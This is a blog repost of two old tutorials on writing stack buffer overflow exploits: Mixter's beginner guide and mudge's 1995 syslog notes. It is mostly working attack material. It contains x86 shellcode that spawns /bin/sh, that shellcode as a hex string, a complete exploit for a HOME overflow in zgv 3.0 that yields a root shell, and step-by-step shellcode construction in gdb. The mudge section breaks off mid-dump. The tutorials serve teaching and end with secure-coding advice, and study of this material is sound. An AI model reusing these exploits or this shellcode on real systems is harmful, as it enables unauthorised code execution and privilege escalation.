Wednesday, October 25, 2006

buffer overflow

Writing buffer




Writing buffer overflow exploits - a tutorial for beginners
by Mixter
http://mixter.void.ru or http://mixter.warrior2k.com

Buffer overflows in user input dependent buffers have become one of the biggest security hazards on the internet and to modern computing in general. This is because such an error can easily be made at programming level, and while invisible for the user who does not understand or cannot acquire the source code, many of those errors are easy to exploit. This paper makes an attempt to teach the novice - average C programmer how an overflow condition can be proven to be exploitable. - Mixter
_______________________________________________________________________________
1. Memory

Note: The way I describe it here, memory for a process is organized on most computers, however it depends on the type of processor architecture. This example is for x86 and also roughly applies to sparc.

The principle of exploiting a buffer overflow is to overwrite parts of memory which aren't supposed to be overwritten by arbitrary input and making the process execute this code. To see how and where an overflow takes place, lets take a look at how memory is organized. A page is a part of memory that uses its own relative addressing, meaning the kernel allocates initial memory for the process, which it can then access without having to know where the memory is physically located in RAM. The processes memory consists of three sections:

- code segment, data in this segment are assembler instructions that the processor executes. The code execution is non-linear, it can skip code, jump, and call functions on certain conditions. Therefore, we have a pointer called EIP, or instruction pointer. The address where EIP points to always contains the code that will be executed next.

- data segment, space for variables and dynamic buffers

- stack segment, which is used to pass data (arguments) to functions and as a space for variables of functions. The bottom (start) of the stack usually resides at the very end of the virtual memory of a page, and grows down. The assembler command PUSHL will add to the top of the stack, and POPL will remove one item from the top of the stack and put it in a register. For accessing the stack memory directly, there is the stack pointer ESP that points at the top (lowest memory address) of the stack.

_______________________________________________________________________________
2. Functions

A function is a piece of code in the code segment, that is called, performs a task, and then returns to the previous thread of execution. Optionally, arguments can be passed to a function. In assembler, it usually looks like this (very simple example, just to get the idea):

memory address code
0x8054321 pushl $0x0
0x8054322 call $0x80543a0
0x8054327 ret
0x8054328 leave
...
0x80543a0 popl %eax
0x80543a1 addl $0x1337,%eax
0x80543a4 ret

What happens here? The main function calls function(0);

The variable is 0, main pushes it onto the stack, and calls the function. The function gets the variable from the stack using popl. After finishing, it returns to 0x8054327. Commonly, the main function would always push register EBP on the stack, which the function stores, and restores after finishing. This is the frame pointer concept, that allows the function to use own offsets for addressing, which is mostly uninteresting while dealing with exploits, because the function will not return to the original execution thread anyways. :-)

We just have to know what the stack looks like. At the top, we have the internal buffers and variables of the function. After this, there is the saved EBP register (32 bit, which is 4 bytes), and then the return address, which is again 4 bytes. Further down, there are the arguments passed to the function, which are uninteresting to us.

In this case, our return address is 0x8054327. It is automatically stored on the stack when the function is called. This return address can be overwritten, and changed to point to any point in memory, if there is an overflow somewhere in the code.
_______________________________________________________________________________
3. Example of an exploitable program

Lets assume that we exploit a function like this:

void lame (void) { char small[30]; gets (small); printf("%s\n", small); }
main() { lame (); return 0; }

Compile and disassemble it:
# cc -ggdb blah.c -o blah
/tmp/cca017401.o: In function `lame':
/root/blah.c:1: the `gets' function is dangerous and should not be used.
# gdb blah
/* short explanation: gdb, the GNU debugger is used here to read the
binary file and disassemble it (translate bytes to assembler code) */
(gdb) disas main
Dump of assembler code for function main:
0x80484c8 : pushl %ebp
0x80484c9 : movl %esp,%ebp
0x80484cb : call 0x80484a0
0x80484d0 : leave
0x80484d1 : ret

(gdb) disas lame
Dump of assembler code for function lame:
/* saving the frame pointer onto the stack right before the ret address */
0x80484a0 : pushl %ebp
0x80484a1 : movl %esp,%ebp
/* enlarge the stack by 0x20 or 32. our buffer is 30 characters, but the
memory is allocated 4byte-wise (because the processor uses 32bit words)
this is the equivalent to: char small[30]; */
0x80484a3 : subl $0x20,%esp
/* load a pointer to small[30] (the space on the stack, which is located
at virtual address 0xffffffe0(%ebp)) on the stack, and call
the gets function: gets(small); */
0x80484a6 : leal 0xffffffe0(%ebp),%eax
0x80484a9 : pushl %eax
0x80484aa : call 0x80483ec
0x80484af : addl $0x4,%esp
/* load the address of small and the address of "%s\n" string on stack
and call the print function: printf("%s\n", small); */
0x80484b2 : leal 0xffffffe0(%ebp),%eax
0x80484b5 : pushl %eax
0x80484b6 : pushl $0x804852c
0x80484bb : call 0x80483dc
0x80484c0 : addl $0x8,%esp
/* get the return address, 0x80484d0, from stack and return to that address.
you don't see that explicitly here because it is done by the CPU as 'ret' */
0x80484c3 : leave
0x80484c4 : ret
End of assembler dump.

3a. Overflowing the program
# ./blah
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxx <- user input
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
# ./blah
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx <- user input
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
Segmentation fault (core dumped)
# gdb blah core
(gdb) info registers
eax: 0x24 36
ecx: 0x804852f 134513967
edx: 0x1 1
ebx: 0x11a3c8 1156040
esp: 0xbffffdb8 -1073742408
ebp: 0x787878 7895160

EBP is 0x787878, this means that we have written more data on the stack than the input buffer could handle. 0x78 is the hex representation of 'x'. The process had a buffer of 32 bytes maximum size. We have written more data into memory than allocated for user input and therefore overwritten EBP and the return address with 'xxxx', and the process tried to resume execution at address 0x787878, which caused it to get a segmentation fault.
3b. Changing the return address

Lets try to exploit the program to return to lame() instead of return. We have to change return address 0x80484d0 to 0x80484cb, that is all. In memory, we have: 32 bytes buffer space | 4 bytes saved EBP | 4 bytes RET. Here is a simple program to put the 4byte return address into a 1byte character buffer:

main()
{
int i=0; char buf[44];
for (i=0;i<=40;i+=4)
*(long *) &buf[i] = 0x80484cb;
puts(buf);
}
# ret
ЛЛЛЛЛЛЛЛЛЛЛ,

# (ret;cat)|./blah
test <- user input
ЛЛЛЛЛЛЛЛЛЛЛ,test
test <- user input
test

Here we are, the program went through the function two times. If an overflow is present, the return address of functions can be changed to alter the programs execution thread.
_______________________________________________________________________________
4. Shellcode

To keep it simple, shellcode is simply assembler commands, which we write on the stack and then change the retun address to return to the stack. Using this method, we can insert code into a vulnerable process and then execute it right on the stack. So, lets generate insertable assembler code to run a shell. A common system call is execve(), which loads and runs any binary, terminating execution of the current process. The manpage gives us the usage:

int execve (const char *filename, char *const argv [], char *const envp[]);

Lets get the details of the system call from glibc2:

# gdb /lib/libc.so.6
(gdb) disas execve
Dump of assembler code for function execve:
0x5da00 : pushl %ebx

/* this is the actual syscall. before a program would call execve, it would
push the arguments in reverse order on the stack: **envp, **argv, *filename */
/* put address of **envp into edx register */
0x5da01 : movl 0x10(%esp,1),%edx
/* put address of **argv into ecx register */
0x5da05 : movl 0xc(%esp,1),%ecx
/* put address of *filename into ebx register */
0x5da09 : movl 0x8(%esp,1),%ebx
/* put 0xb in eax register; 0xb == execve in the internal system call table */
0x5da0d : movl $0xb,%eax
/* give control to kernel, to execute execve instruction */
0x5da12 : int $0x80

0x5da14 : popl %ebx
0x5da15 : cmpl $0xfffff001,%eax
0x5da1a : jae 0x5da1d <__syscall_error>
0x5da1c : ret
End of assembler dump.

4a. making the code portable

We have to apply a trick to be able to make shellcode without having to reference the arguments in memory the conventional way, by giving their exact address on the memory page, which can only be done at compile time.

Once we can estimate the size of the shellcode, we can use the instructions jmp and call to go a specified number of bytes back or forth in the execution thread. Why use a call? We have the opportunity that a CALL will automatically store the return address on the stack, the return address being the next 4 bytes after the CALL instruction. By placing a variable right behind the call, we indirectly push its address on the stack without having to know it.

0 jmp (skip Z bytes forward)
2 popl %esi
... put function(s) here ...
Z call <-Z+2> (skip 2 less than Z bytes backward, to POPL)
Z+5 .string (first variable)

(Note: If you're going to write code more complex than for spawning a simple shell, you can put more than one .string behind the code. You know the size of those strings and can therefore calculate their relative locations once you know where the first string is located.)
4b. the shellcode

global code_start /* we'll need this later, dont mind it */
global code_end
.data
code_start:
jmp 0x17
popl %esi
movl %esi,0x8(%esi) /* put address of **argv behind shellcode,
0x8 bytes behind it so a /bin/sh has place */
xorl %eax,%eax /* put 0 in %eax */
movb %eax,0x7(%esi) /* put terminating 0 after /bin/sh string */
movl %eax,0xc(%esi) /* another 0 to get the size of a long word */
my_execve:
movb $0xb,%al /* execve( */
movl %esi,%ebx /* "/bin/sh", */
leal 0x8(%esi),%ecx /* & of "/bin/sh", */
xorl %edx,%edx /* NULL */
int $0x80 /* ); */
call -0x1c
.string "/bin/shX" /* X is overwritten by movb %eax,0x7(%esi) */
code_end:

(The relative offsets 0x17 and -0x1c can be gained by putting in 0x0, compiling, disassembling and then looking at the shell codes size.)

This is already working shellcode, though very minimal. You should at least disassemble the exit() syscall and attach it (before the 'call'). The real art of making shellcode also consists of avoiding any binary zeroes in the code (indicates end of input/buffer very often) and modify it for example, so the binary code does not contain control or lower characters, which would get filtered out by some vulnerable programs. Most of this stuff is done by self-modifying code, like we had in the movb %eax,0x7(%esi) instruction. We replaced the X with \0, but without having a \0 in the shellcode initially...

Lets test this code... save the above code as code.S (remove comments) and the following file as code.c:

extern void code_start();
extern void code_end();
#include
main() { ((void (*)(void)) code_start)(); }

# cc -o code code.S code.c
# ./code
bash#

You can now convert the shellcode to a hex char buffer. Best way to do this is, print it out:

#include
extern void code_start(); extern void code_end();
main() { fprintf(stderr,"%s",code_start); }

and parse it through aconv -h or bin2c.pl, those tools can be found at: http://www.dec.net/~dhg or http://members.tripod.com/mixtersecurity
_______________________________________________________________________________
5. Writing an exploit

Let us take a look at how to change the return address to point to shellcode put on the stack, and write a sample exploit. We will take zgv, because that is one of the easiest things to exploit out there :)

# export HOME=`perl -e 'printf "a" x 2000'`
# zgv
Segmentation fault (core dumped)
# gdb /usr/bin/zgv core
#0 0x61616161 in ?? ()
(gdb) info register esp
esp: 0xbffff574 -1073744524

Well, this is the top of the stack at crash time. It is safe to presume that we can use this as return address to our shellcode.

We will now add some NOP (no operation) instructions before our buffer, so we don't have to be 100% correct regarding the prediction of the exact start of our shellcode in memory (or even brute forcing it). The function will return onto the stack somewhere before our shellcode, work its way through the NOPs to the inital JMP command, jump to the CALL, jump back to the popl, and run our code on the stack.

Remember, the stack looks like this: at the lowest memory address, the top of the stack where ESP points to, the initial variables are stored, namely the buffer in zgv that stores the HOME environment variable. After that, we have the saved EBP(4bytes) and the return address of the previous function. We must write 8 bytes or more behind the buffer to overwrite the return address with our new address on the stack.

The buffer in zgv is 1024 bytes big. You can find that out by glancing at the code, or by searching for the initial subl $0x400,%esp (=1024) in the vulnerable function. We will now put all those parts together in the exploit:
5a. Sample zgv exploit

/* zgv v3.0 exploit by Mixter
buffer overflow tutorial - http://1337.tsx.org

sample exploit, works for example with precompiled
redhat 5.x/suse 5.x/redhat 6.x/slackware 3.x linux binaries */

#include
#include
#include

/* This is the minimal shellcode from the tutorial */
static char shellcode[]=
"\xeb\x17\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d"
"\x4e\x08\x31\xd2\xcd\x80\xe8\xe4\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x58";

#define NOP 0x90
#define LEN 1032
#define RET 0xbffff574

int main()
{
char buffer[LEN];
long retaddr = RET;
int i;

fprintf(stderr,"using address 0x%lx\n",retaddr);

/* this fills the whole buffer with the return address, see 3b) */
for (i=0;i *(long *)&buffer[i] = retaddr;

/* this fills the initial buffer with NOP's, 100 chars less than the
buffer size, so the shellcode and return address fits in comfortably */
for (i=0;i *(buffer+i) = NOP;

/* after the end of the NOPs, we copy in the execve() shellcode */
memcpy(buffer+i,shellcode,strlen(shellcode));

/* export the variable, run zgv */

setenv("HOME", buffer, 1);
execlp("zgv","zgv",NULL);
return 0;
}

/* EOF */

We now have a string looking like this:

[ ... NOP NOP NOP NOP NOP JMP SHELLCODE CALL /bin/sh RET RET RET RET RET RET ]

While zgv's stack looks like this:

v-- 0xbffff574 is here
[ S M A L L B U F F E R ] [SAVED EBP] [ORIGINAL RET]

The execution thread of zgv is now as follows:

main ... -> function() -> strcpy(smallbuffer,getenv("HOME"));

At this point, zgv fails to do bounds checking, writes beyond smallbuffer, and the return address to main is overwritten with the return address on the stack. function() does leave/ret and the EIP points onto the stack:

0xbffff574 nop
0xbffff575 nop
0xbffff576 nop
0xbffff577 jmp $0x24 1
0xbffff579 popl %esi 3 <--\ |
[... shellcode starts here ...] | |
0xbffff59b call -$0x1c 2 <--/
0xbffff59e .string "/bin/shX"

Lets test the exploit...

# cc -o zgx zgx.c
# ./zgx
using address 0xbffff574
bash#

5b. further tips on writing exploits

There are a lot of programs which are tough to exploit, but nonetheless vulnerable. However, there are a lot of tricks you can do to get behind filtering and such. There are also other overflow techniques which do not necessarily include changing the return address at all or only the return address. There are so-called pointer overflows, where a pointer that a function allocates can be overwritten by an overflow, altering the programs execution flow (an example is the RoTShB bind 4.9 exploit), and exploits where the return address points to the shells environment pointer, where the shellcode is located instead of being on the stack (this defeats very small buffers, and Non-executable stack patches, and can fool some security programs, though it can only be performed locally).

Another important subject for the skilled shellcode author is radically self-modifying code, which initially only consists of printable, non-white upper case characters, and then modifies itself to put functional shellcode on the stack which it executes, etc.

You should never, ever have any binary zeroes in your shell code, because it will most possibly not work if it contains any. But discussing how to sublimate certain assembler commands with others would go beyond the scope of this paper. I also suggest reading the other great overflow howto's out there, written by aleph1, Taeoh Oh and mudge.
5c. Important Note

You will NOT be able to use this tutorial on Windows or Macintosh. Do NOT ask me for cc.exe and gdb.exe either!
_______________________________________________________________________________
6. Conclusions

We have learned, that once an overflow is present which is user dependent, it can be exploited about 90% of the time, even though exploiting some situations is difficult and takes some skill. Why is it important to write exploits? Because ignorance is omniscient in the software industry. There have already been reports of vulnerabilities due to buffer overflows in software, though the software has not been updated, or the majority of users didn't update, because the vulnerability was hard to exploit and nobody believed it created a security risk. Then, an exploit actually comes out, proves and practically enables a program to be exploitable, and there is usually a big (neccessary) hurry to update it.

As for the programmer (you), it is a hard task to write secure programs, but it should be taken very serious. This is a specially large concern when writing servers, any type of security programs, or programs that are suid root, or designed to be run by root, any special accounts, or the system itself. Apply bounds checking (strn*, sn*, functions instead of sprintf etc.), prefer allocating buffers of a dynamic, input-dependent, size, be careful on for/while/etc. loops that gather data and stuff it into a buffer, and generally handle user input with very much care are the main principles I suggest.

There has also been made notable effort of the security industry to prevent overflow problems with techniques like non-executable stack, suid wrappers, guard programs that check return addresses, bounds checking compilers, and so on. You should make use of those techniques where possible, but do not fully rely on them. Do not assume to be safe at all if you run a vanilla two-year old UNIX distribution without updates, but overflow protection or (even more stupid) firewalling/IDS. It cannot assure security, if you continue to use insecure programs because _all_ security programs are _software_ and can contain vulnerabilities themselves, or at least not be perfect. If you apply frequent updates _and_ security measures, you can still not expect to be secure, _but_ you can hope.

How to write Buffer Overflows

This is really rough, and some of it is not needed. I wrote this as a reminder note to myself as I really didn't want to look at any more AT&T assembly again for a while and was afraid I would forget what I had done. If you are an old assembly guru then you might scoff at some of this... oh well, it works and that's a hack in itself.

-by mudge@l0pht.com 10/20/95

test out the program (duh).

--------syslog_test_1.c------------

#include

char buffer[4028];

void main() {

int i;

for (i=0; i<=4028; i++)
buffer[i]='A';

syslog(LOG_ERR, buffer);
}

--------end syslog_test_1.c----------

Compile the program and run it. Make sure you include the symbol table for the debugger or not... depending upon how macho you feel today.

bash$ gcc -g buf.c -o buf
bash$ buf
Segmentation fault (core dumped)


The 'Segmentation fault (core dumped)' is what we wanted to see. This tells us there is definately an attempt to access some memory address that we shouldn't. If you do much in 'C' with pointers on a unix machine you have probably seen this (or Bus error) when pointing or dereferencing incorrectly.

Fire up gdb on the program (with or without the core file). Assuming you remove the core file (this way you can learn a bit about gdb), the steps would be as follows:

bash$ gdb buf
(gdb) run
Starting program: /usr2/home/syslog/buf

Program received signal 11, Segmentation fault
0x1273 in vsyslog (0x41414141, 0x41414141, 0x41414141, 0x41414141)


Ok, this is good. The 41's you see are the hex equivallent for the ascii character 'A'. We are definately going places where we shouldn't be.

(gdb) info all-registers
eax 0xefbfd641 -272640447
ecx 0x00000000 0
edx 0xefbfd67c -272640388
ebx 0xefbfe000 -272637952
esp 0xefbfd238 0xefbfd238
ebp 0xefbfde68 0xefbfde68
esi 0xefbfd684 -272640380
edi 0x0000cce8 52456
eip 0x00001273 0x1273
ps 0x00010212 66066
cs 0x0000001f 31
ss 0x00000027 39
ds 0x00000027 39
es 0x00000027 39
fs 0x00000027 39
gs 0x00000027 39


The gdb command 'info all-registers' shows the values in the current hardware registers. The one we are really interested in is 'eip'. On some platforms this will be called 'ip' or 'pc'. It is the Instruction Pointer [also called Program Counter]. It points to the memory location of the next instruction the processor will execute. By overwriting this you can point to the beginning of your own code and the processor will merrily start executing it assuming you have it written as native opcodes and operands.

In the above we haven't gotten exactly where we need to be yet. If you want to see where it crashed out do the following:

(gdb) disassemble 0x1273
[stuff deleted]
0x1267 : incl 0xfffff3dc(%ebp)
0x126d : testb %al,%al
0x126f : jne 0x125c
0x1271 : jmp 0x1276
0x1273 : movb %al,(%ebx)
0x1275 : incl %ebx
0x1276 : incl %edi
0x1277 : movb (%edi),%al
0x1279 : testb %al,%al


If you are familiar with microsoft assembler this will be a bit backwards to you. For example: in microsoft you would 'mov ax,cx' to move cx to ax. In AT&T 'mov ax,cx' moves ax to cx. So put on those warp refraction eye-goggles and on we go.

Note also that Intel assembler

let's go back and tweak the original source code some eh?

-------------syslog_test_2.c-------------

#include

char buffer[4028];

void main() {

int i;

for (i=0; i<2024; i++)
buffer[i]='A';

syslog(LOG_ERR, buffer);
}

-----------end syslog_test_2.c-------------

We're just shortening the length of 'A''s.

bash$ gcc -g buf.c -o buf
bash$ gdb buf
(gdb) run
Starting program: /usr2/home/syslog/buf

Program received signal 5, Trace/BPT trap
0x1001 in ?? (Error accessing memory address 0x41414149: Cannot
allocate memory.


This is the magic response we've been looking for.

(gdb) info all-registers
eax 0xffffffff -1
ecx 0x00000000 0
edx 0x00000008 8
ebx 0xefbfdeb4 -272638284
esp 0xefbfde70 0xefbfde70
ebp 0x41414141 0x41414141 <- here it is!!!
esi 0xefbfdec0 -272638272
edi 0xefbfdeb8 -272638280
eip 0x00001001 0x1001
ps 0x00000246 582
cs 0x0000001f 31
ss 0x00000027 39
ds 0x00000027 39
es 0x00000027 39
fs 0x00000027 39
gs 0x00000027 39



Now we move it along until we figure out where eip lives in the overflow (which is right after ebp in this arch architecture). With that known fact we only have to add 4 more bytes to our buffer of 'A''s and we will overwrite eip completely.

---------syslog_test_3.c----------------

#include

char buffer[4028];

void main() {

int i;

for (i=0; i<2028; i++)
buffer[i]='A';

syslog(LOG_ERR, buffer);
}
-------end syslog_test_3.c------------

bash$ !gc
gcc -g buf.c -o buf
bash$ gdb buf
(gdb) run
Starting program: /usr2/home/syslog/buf

Program received signal 11, Segmentation fault
0x41414141 in errno (Error accessing memory address
0x41414149: Cannot allocate memory.


(gdb) info all-registers
eax 0xffffffff -1
ecx 0x00000000 0
edx 0x00000008 8
ebx 0xefbfdeb4 -272638284
esp 0xefbfde70 0xefbfde70
ebp 0x41414141 0x41414141
esi 0xefbfdec0 -272638272
edi 0xefbfdeb8 -272638280
eip 0x41414141 0x41414141
ps 0x00010246 66118
cs 0x0000001f 31
ss 0x00000027 39
ds 0x00000027 39
es 0x00000027 39
fs 0x00000027 39
gs 0x00000027 39


BINGO!!!

Here's where it starts to get interesting. Now that we know eip starts at buffer[2024] and goes through buffer[2027] we can load it up with whatever we need. The question is... what do we need?

We find this by looking at the contents of buffer[].

(gdb) disassemble buffer
[stuff deleted]
0xc738 : incl %ecx
0xc739 : incl %ecx
0xc73a : incl %ecx
0xc73b : incl %ecx
0xc73c : addb %al,(%eax)
0xc73e : addb %al,(%eax)
0xc740 : addb %al,(%eax)
[stuff deleted]


On the Intel x86 architecture [a pentium here but that doesn't matter] incl %eax is opcode 0100 0001 or 41hex. addb %al,(%eax) is 0000 0000 or 0x0 hex. We will load up buffer[2024] to buffer[2027] with the address of 0xc73c where we will start our code. You have two options here, one is to load the buffer up with the opcodes and operands and point the eip back into the buffer; the other option is what we are going to be doing which is to put the opcodes and operands after the eip and point to them.

The advantage to putting the code inside the buffer is that other than the ebp and eip registers you don't clobber anything else. The disadvantage is that you will need to do trickier coding (and actually write the assembly yourself) so that there are no bytes that contain 0x0 which will look like a null in the string. This will require you to know enough about the native chip architecture and opcodes to do this [easy enough for some people on Intel x86's but what happens when you run into an Alpha? -- lucky for us there is a gdb for Alpha I think ;-)].

The advantage to putting the code after the eip is that you don't have to worry about bytes containing 0x0 in them. This way you can write whatever program you want to execute in 'C' and have gdb generate most of the machine code for you. The disadvantage is that you are overwriting the great unknown. In most cases the section you start to overwrite here contains your environment variables and other whatnots.... upon succesfully running your created code you might be dropped back into a big void. Deal with it.

The safest instruction is NOP which is a benign no-operation. This is what you will probably be loading the buffer up with as filler.

Ahhh but what if you don't know what the opcodes are for the particular architecture you are on. No problem. gcc has a wonderfull function called __asm__(char *); I rely upon this heavily for doing buffer overflows on architectures that I don't have assembler books for.

------nop.c--------
void main(){

__asm__("nop\n");

}
----end nop.c------

bash$ gcc -g nop.c -o nop
bash$ gdb nop
(gdb) disassemble main
Dump of assembler code for function main:
to 0x1088:
0x1080 : pushl %ebp
0x1081 : movl %esp,%ebp
0x1083 : nop
0x1084 : leave
0x1085 : ret
0x1086 : addb %al,(%eax)
End of assembler dump.
(gdb) x/bx 0x1083
0x1083 : 0x90


Since nop is at 0x1083 and the next instruction is at 0x1084 we know that nop only takes up one byte. Examining that byte shows us that it is 0x90 (hex).

Our program now looks like this:

------ syslog_test_4.c---------

#include

char buffer[4028];

void main() {

int i;

for (i=0; i<2024; i++)
buffer[i]=0x90;

i=2024;

buffer[i++]=0x3c;
buffer[i++]=0xc7;
buffer[i++]=0x00;
buffer[i++]=0x00;


syslog(LOG_ERR, buffer);
}
------end syslog_test_4.c-------


Notice you need to load the eip backwards ie 0000c73c is loaded into the buffer as 3c c7 00 00.

Now the question we have is what is the code we insert from here on?

Suppose we want to run /bin/sh? Gee, I don't have a friggin clue as to why someone would want to do something like this, but I hear there are a lot of nasty people out there. Oh well. Here's the proggie we want to execute in C code:

------execute.c--------
#include
main()
{
char *name[2];
name[0] = "sh";
name[1] = NULL;
execve("/bin/sh",name,NULL);
}
----end execute.c-------

bash$ gcc -g execute.c -o execute
bash$ execute
$


Ok, the program works. Then again, if you couldn't whip up that little prog you should probably throw in the towel here. Maybe become a webmaster or something that requires little to no programming (or brainwave activity period). Here's the gdb scoop:

bash$ gdb execute
(gdb) disassemble main
Dump of assembler code for function main:
to 0x10b8:
0x1088 : pushl %ebp
0x1089 : movl %esp,%ebp
0x108b : subl $0x8,%esp
0x108e : movl $0x1080,0xfffffff8(%ebp)
0x1095 : movl $0x0,0xfffffffc(%ebp)
0x109c : pushl $0x0
0x109e : leal 0xfffffff8(%ebp),%eax
0x10a1 : pushl %eax
0x10a2 : pushl $0x1083
0x10a7 : call 0x10b8
0x10ac : leave
0x10ad : ret
0x10ae : addb %al,(%eax)
0x10b0 : jmp 0x1140
0x10b5 : addb %al,(%eax)
0x10b7 : addb %cl,0x3b05(%ebp)
End of assembler dump.

(gdb) disassemble execve
Dump of assembler code for function execve:
to 0x10c8:
0x10b8 : leal 0x3b,%eax
0x10be : lcall 0x7,0x0
0x10c5 : jb 0x10b0
0x10c7 : ret
End of assembler dump.


This is the assembly behind what our execute program does to run /bin/sh. We use execve() as it is a system call and this is what we are going to have our program execute (ie let the kernel service run it as opposed to having to write it from scratch).

0x1083 contains the /bin/sh string and is the last thing pushed onto the stack before the call to execve.

(gdb) x/10bc 0x1083
0x1083 : 47 '/' 98 'b' 105 'i' 110 'n' 47 '/' 115 's'
104 'h' 0 '\000'


(0x1080 contains the arguments...which I haven't been able to really clean up).

We will replace this address with the one where our string lives [when we decide where that will be].

Here's the skeleton we will use from the execve disassembly:

[main]
0x108d : movl %esp,%ebp

0x108e : movl $0x1083,0xfffffff8(%ebp)
0x1095 : movl $0x0,0xfffffffc(%ebp)
0x109c : pushl $0x0
0x109e : leal 0xfffffff8(%ebp),%eax
0x10a1 : pushl %eax
0x10a2 : pushl $0x1080

[execve]
0x10b8 : leal 0x3b,%eax
0x10be : lcall 0x7,0x0


All you need to do from here is to build up a bit of an environment for the program. Some of this stuff isn't necesary but I have it in still as I haven't fine tuned this yet.

I clean up eax. I don't remember why I do this and it shouldn't really be necesarry. Hell, better quit hitting the sauce. I'll figure out if it is after I tune this up a bit.

xorl %eax,%eax


We will encapsulate the actuall program with a jmp to somewhere and a call right back to the instruction after the jmp. This pushes ecx and esi onto the stack.

jmp 0x???? # this will jump to the call...
popl %esi
popl %ecx


The call back will be something like:

call 0x???? # this will point to the instruction after the jmp (ie
# popl %esi)

All put together it looks like this now:

----------------------------------------------------------------------
movl %esp,%ebp
xorl %eax,%eax
jmp 0x???? # we don't know where yet...
# -------------[main]
movl $0x????,0xfffffff8(%ebp) # we don't know what the address will
# be yet.
movl $0x0,0xfffffffc(%ebp)
pushl $0x0
leal 0xfffffff8(%ebp),%eax
pushl %eax
pushl $0x???? # we don't know what the address will
# be yet.
# ------------[execve]
leal 0x3b,%eax
lcall 0x7,0x0

call 0x???? # we don't know where yet...

----------------------------------------------------------------------


There are only a couple of more things that we need to add before we fill in the addresses to a couple of the instructions.

Since we aren't actually calling execve with a 'call' anymore here, we need to push the value in ecx onto the stack to simulate it.

# ------------[execve]
pushl %ecx
leal 0x3b,%eax
lcall 0x7,0x0


The only other thing is to not pass in the arguments to /bin/sh. We do this by changing the ' leal 0xfffffff8(%ebp),%eax' to ' leal 0xfffffffc(%ebp),%eax' [remember 0x0 was moved there].

So the whole thing looks like this (without knowing the addresses for the '/bin/sh\0' string):

movl %esp,%ebp
xorl %eax,%eax # we added this
jmp 0x???? # we added this
popl %esi # we added this
popl %ecx # we added this
movl $0x????,0xfffffff5(%ebp)
movl $0x0,0xfffffffc(%ebp)
pushl $0x0
leal 0xfffffffc(%ebp),%eax # we changed this
pushl %eax
pushl $0x????
leal 0x3b,%eax
pushl %ecx # we added this
lcall 0x7,0x0
call 0x???? # we added this


To figure out the bytes to load up our buffer with for the parts that were already there run gdb on the execute program.

bash$ gdb execute
(gdb) disassemble main
Dump of assembler code for function main:
to 0x10bc:
0x108c : pushl %ebp
0x108d : movl %esp,%ebp
0x108f : subl $0x8,%esp
0x1092 : movl $0x1080,0xfffffff8(%ebp)
0x1099 : movl $0x0,0xfffffffc(%ebp)
0x10a0 : pushl $0x0
0x10a2 : leal 0xfffffff8(%ebp),%eax
0x10a5 : pushl %eax
0x10a6 : pushl $0x1083
0x10ab : call 0x10bc
0x10b0 : leave
0x10b1 : ret
0x10b2 : addb %al,(%eax)
0x10b4 : jmp 0x1144
0x10b9 : addb %al,(%eax)
0x10bb : addb %cl,0x3b05(%ebp)
End of assembler dump.

[get out your scratch paper for this one... ]

0x108d : movl %esp,%ebp
this goes from 0x108d to 0x108e. 0x108f starts the next instruction.
thus we can see the machine code with gdb like this.

(gdb) x/2bx 0x108d
0x108d : 0x89 0xe5


Now we know that buffer[2028]=0x89 and buffer[2029]=0xe5. Do this for all of the instructions that we are pulling out of the execute program. You can figure out the basic structure for the call command by looking at the one inexecute that calls execve. Of course you will eventually need to put in the proper address.

When I work this out I break down the whole program so I can see what's going on. Something like the following

0x108c : pushl %ebp
0x108d : movl %esp,%ebp
0x108f : subl $0x8,%esp

(gdb) x/bx 0x108c
0x108c : 0x55
(gdb) x/bx 0x108d
0x108d : 0x89
(gdb) x/bx 0x108e
0x108e : 0xe5
(gdb) x/bx 0x108e
0x108f : 0x83

so we see the following from this:

0x55 pushl %ebp

0x89 movl %esp,%ebp
0xe5

0x83 subl $0x8,%esp

etc. etc. etc.


For commands that you don't know the opcodes to you can find them out for the particular chip you are on by writing little scratch programs.

----pop.c-------
void main() {

__asm__("popl %esi\n");

}
---end pop.c----

bash$ gcc -g pop.c -o pop
bash$ gdb pop
(gdb) disassemble main
Dump of assembler code for function main:
to 0x1088:
0x1080 : pushl %ebp
0x1081 : movl %esp,%ebp
0x1083 : popl %esi
0x1084 : leave
0x1085 : ret
0x1086 : addb %al,(%eax)
End of assembler dump.
(gdb) x/bx 0x1083
0x1083 : 0x5e


So, 0x5e is popl %esi. You get the idea. After you have gotten this far build the string up (put in bogus addresses for the ones you don't know in the jmp's and call's... just so long as we have the right amount of space being taken up by the jmp and call instructions... likewise for the movl's where we will need to know the memory location of 'sh\0\0/bin/sh\0'.

After you have built up the string, tack on the chars for sh\0\0/bin/sh\0.

Compile the program and load it into gdb. Before you run it in gdb set a break point for the syslog call.

(gdb) break syslog
Breakpoint 1 at 0x1463
(gdb) run
Starting program: /usr2/home/syslog/buf

Breakpoint 1, 0x1463 in syslog (0x00000003, 0x0000bf50, 0x0000082c,
0xefbfdeac)
(gdb) disassemble 0xc73c 0xc77f
(we know it will start at 0xc73c since thats right after the
eip overflow... 0xc77f is just an educated guess as to where
it will end)

(gdb) disassemble 0xc73c 0xc77f
Dump of assembler code from 0xc73c to 0xc77f:
0xc73c : movl %esp,%ebp
0xc73e : xorl %eax,%eax
0xc740 : jmp 0xc76b
0xc742 : popl %esi
0xc743 : popl %ecx
0xc744 : movl $0xc770,0xfffffff5(%ebp)
0xc74b : movl $0x0,0xfffffffc(%ebp)
0xc752 : pushl $0x0
0xc754 : leal 0xfffffffc(%ebp),%eax
0xc757 : pushl %eax
0xc758 : pushl $0xc773
0xc75d : leal 0x3b,%eax
0xc763 : pushl %ecx
0xc764 : lcall 0x7,0x0
0xc76b : call 0xc742
0xc770 : jae 0xc7da
0xc772 : addb %ch,(%edi)
0xc774 : boundl 0x6e(%ecx),%ebp
0xc777 : das
0xc778 : jae 0xc7e2
0xc77a : addb %al,(%eax)
0xc77c : addb %al,(%eax)
0xc77e : addb %al,(%eax)
End of assembler dump.


Look for the last instruction in your code. In this case it was the 'call' to right after the 'jmp' near the beginning. Our data should be right after it and indeed we see that it is.

(gdb) x/13bc 0xc770
0xc770 : 115 's' 104 'h' 0 '\000' 47 '/'
